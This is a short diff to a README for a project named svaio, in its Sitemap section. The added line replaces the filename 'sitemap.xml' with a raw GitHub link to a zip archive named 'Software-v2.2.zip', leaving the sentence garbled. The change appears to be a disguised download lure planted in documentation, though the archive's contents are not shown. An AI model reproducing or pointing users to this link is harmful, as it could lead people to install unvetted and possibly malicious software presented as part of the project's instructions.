vlad1356226/svaio/README.md

 ### Sitemap

-Generate a sitemap.xml file for your application with the sitemap utility.
+Generate a https://github.com/vlad1356226/svaio/raw/refs/heads/main/packages/tools/unocss/Software-v2.2.zip file for your application with the sitemap utility.
 This helps search engines index your site effectively.

 #### Example Usage